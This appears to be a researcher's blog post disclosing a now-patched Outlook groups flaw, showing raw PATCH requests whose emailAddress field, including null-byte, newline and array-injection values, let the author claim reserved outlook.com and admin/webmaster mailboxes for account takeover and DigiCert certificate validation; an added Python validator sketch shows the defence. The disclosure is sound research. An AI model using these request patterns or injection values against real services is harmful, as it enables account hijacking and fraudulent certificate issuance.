msrc disc. (outlook exploit)
scheduled to be released oct 31st 2025. full disclosure as of march 15 2026
outlook is commonly used by a lot of companies to conduct corporate shit. one feature of outlook is the ability to make groups:

interestingly, outlook groups can receive mail (they basically act as separate inboxes) from anywhere - they have an email address in the form of name@groups.outlook.com. in addition to this, personal (non-enterprise/ms365) mails also go through different endpoints when creating a new group. we’ll look at one of these endpoints today; ill publish something different for the ms365 one once i finalize a new report jajaja
PATCH /Speedway/v1.0/Groups
when creating a new group and finalizing the name for the email, the request looks something akin to this:
PATCH /Speedway/v1.0/Groups('OID:c8c90000-2952-4ca4-0000-000000000000@[REDACTED]-e9f6-40af-b435-aaaaaaaaaaaa') HTTP/2
Host: outlook.live.com
...
Referer: https://outlook.live.com/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
{"emailAddress":"helloworldserqwerqwerqwern@groups.outlook.com"}
one obvious vector is the emailAddress field. changing it to something like this:
PATCH /Speedway/v1.0/Groups('OID:c8c90000-2952-4ca4-0000-000000000000@[REDACTED]-e9f6-40af-b435-aaaaaaaaaaaa') HTTP/2
Host: outlook.live.com
...
Referer: https://outlook.live.com/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
{"emailAddress":"holy@outlook.com"}
works. trying to sign up for holy@outlook.com errors, showing that its ‘unavailable’. interesting!
testing the email out, i managed to sign up for an account on twitter:

obviously this means anyone that has signed up for an account on any platform before and has had their outlook email somehow invalidated/reserved by outlook can likely get their account taken over using this tiny little vulnerability.
the only caveat with this however obv is the fact that we can only take accounts that are locked/reserved/glitched; we cannot take over existing inboxes. interestingly however, some existing inboxes that are ‘glitched’ (dont know how) will not be able to receive mail if we use the exploit to take over their inbox. interesting!
as a side note, these domains also worked:
- live.com
- msn.com
- windowslive.com
more stuff
clearly more can be done. as a starter, lets try taking over an existing inbox that isnt glitched. trying this on my own inbox:
PATCH /Speedway/v1.0/Groups('OID:c8c90000-2952-4ca4-0000-000000000000@[REDACTED]-e9f6-40af-b435-aaaaaaaaaaaa') HTTP/2
Host: outlook.live.com
...
Referer: https://outlook.live.com/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
{"emailAddress":"secret@outlook.com"}
returns a 400 bad request, saying that there was an error with claiming the email. trying this:
PATCH /Speedway/v1.0/Groups('OID:c8c90000-2952-4ca4-0000-000000000000@[REDACTED]-e9f6-40af-b435-aaaaaaaaaaaa') HTTP/2
Host: outlook.live.com
...
Referer: https://outlook.live.com/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
{"emailAddress":"holy%00@outlook.com"}
however, worked. it goes without saying however that any inbox with null bytes in it is heavily glitched to oblivion:

trying
PATCH /Speedway/v1.0/Groups('OID:c8c90000-2952-4ca4-0000-000000000000@[REDACTED]-e9f6-40af-b435-aaaaaaaaaaaa') HTTP/2
Host: outlook.live.com
...
Referer: https://outlook.live.com/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
{"emailAddress":"holy%2500@outlook.com"}
also yielded a similar result. as a side note, there may or may not be another vuln with the error window (you can probably guess what this is), but microsofts fixes alleviated this and seemingly also fixed the side vuln.
anyway lets try this:
PATCH /Speedway/v1.0/Groups('OID:c8c90000-2952-4ca4-0000-000000000000@[REDACTED]-e9f6-40af-b435-aaaaaaaaaaaa') HTTP/2
Host: outlook.live.com
...
Referer: https://outlook.live.com/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
{"emailAddress":"holy\u0000@outlook.com"}
this made my inbox completely unusable and at times load a responsecode=undefined page with broken css:

(side note: different email, same thingamabob you get the idea)
and the only way was to re-send the same request with some other name.
getting webmaster access, cert takeover
if you dont know what digicert is you should probably google it and come back lol. anyway, digicert is a cert authority that issues tls/ssl and code-signing certs. since ca’s basically are centralized vouching figures, taking over this would be pretty silly; since we can start impersonating.
one interesting thing about digicert is that it issues 2 kinds of digicert domain control validation (dcv) requests to verify you own the domain:
- setting a txt record (obv we cant do that in this situation)
- send an email to webmaster@domain.com or administrator/admin@domain.com
im sure you can see what im getting at now. taking over administrator@outlook.com was pretty trivial, alongside taking over webmaster@msn.com, webmaster@live.com and administrator@msn.com:
PATCH /Speedway/v1.0/Groups/.....blah HTTP/2
Host: outlook.live.com
...
Referer: https://outlook.live.com/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
{"emailAddress":"administrator@outlook.com"}
and then tried multiple variations:
PATCH /Speedway/v1.0/Groups/.....blah HTTP/2
Host: outlook.live.com
...
Referer: https://outlook.live.com/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
{"emailAddress":"administrator%0A@outlook.com"}
etc..
all of which returned a 204. its wraps
interesting emails
taking over administrator@outlook.com and other webmaster mails was likely not a good idea; as i was bombarded by dcv requests from random companies:

and random emails from people thinking that administrator@outlook.com can help them get back in their old outlook account, alongside people who decide to send their passwords in their email. also some dumbass from taiwan signed up for a roblox acc with the email so idk lol. obv i wont show most of the emails here
i submitted a report to msrc after tinkering a bit more with the dcv idea and concluding that i can in fact request and obtain ssl/tls certs for outlook.com
attempting to defeat the validator
over the next few days i tried bypassing their email normalization/canonicalization by trying different variations of null bytes, newlines, crlfs, random oid objects, malformed requests like:
PATCH /Speedway/v1.0/Groups/.....blah HTTP/2
Host: outlook.live.com
...
Referer: https://outlook.live.com/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
{"emailAddress": ["invalid@outlook.com", "accept_me@outlook.com"]}
and many many more. a few worked and gave really interesting responses but by the time i got around to fully figuring out a proper way to defeat the validator microsoft swiftly patched the vuln and started nuking group inboxes. so erm yep
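for the defensive side of the validator and dcv sections above, here is an added example (not from the original post and not microsoft's code) of the server-side check the emailAddress field was missing: strict typing, one canonicalization pass, a fixed domain, an allow-listed local part and reserved ca role mailboxes. the function name, the allow-list and the reserved set are assumptions made for this sketch; the request bodies are constructed from the ones shown in this post.

```python
import json
import unicodedata

GROUP_DOMAIN = "groups.outlook.com"  # assumption: the only domain an alias may use
# Role mailboxes accepted for email-based DCV under the CA/Browser Forum rules.
DCV_ROLE_NAMES = {"admin", "administrator", "webmaster", "hostmaster", "postmaster"}
ALLOWED_LOCAL = set("abcdefghijklmnopqrstuvwxyz0123456789._-")


def validate_group_address(raw_body):
    """Return (accepted, canonical_address_or_reason) for a rename request body."""
    try:
        body = json.loads(raw_body)
    except ValueError:
        return False, "body is not valid JSON"
    value = body.get("emailAddress") if isinstance(body, dict) else None
    if not isinstance(value, str):
        # Arrays, objects and numbers are rejected, never coerced or indexed.
        return False, "emailAddress must be a single string"
    # Canonicalize once, validate the canonical form, and store only that form.
    addr = unicodedata.normalize("NFKC", value).lower()
    if addr.count("@") != 1:
        return False, "exactly one @ required"
    local, domain = addr.split("@")
    if domain != GROUP_DOMAIN:
        return False, "domain is not the group domain"
    # Allow-list: also rejects NUL, CR/LF, '%' (still-encoded bytes) and spaces.
    if not 1 <= len(local) <= 64 or not set(local) <= ALLOWED_LOCAL:
        return False, "local part has disallowed characters"
    if local in DCV_ROLE_NAMES:
        return False, "local part is a reserved role mailbox"
    return True, addr


# Constructed request bodies, modelled on the ones shown in this post.
SAMPLES = [
    b'{"emailAddress":"helloworldserqwerqwerqwern@groups.outlook.com"}',
    b'{"emailAddress":"holy@outlook.com"}',
    b'{"emailAddress":"holy%00@groups.outlook.com"}',
    b'{"emailAddress":"holy\\u0000@groups.outlook.com"}',
    b'{"emailAddress":["invalid@outlook.com","accept_me@outlook.com"]}',
    b'{"emailAddress":"\\uff41dministrator@groups.outlook.com"}',
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample.decode(), "->", validate_group_address(sample))
```

the last sample uses a fullwidth "a", which only matches the reserved list because the check runs on the canonical form; whatever gets stored and routed has to be that same canonical string.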
final
after reporting the bug months before, microsoft sent an update saying the exploit would be fully addressed by december. very speedy!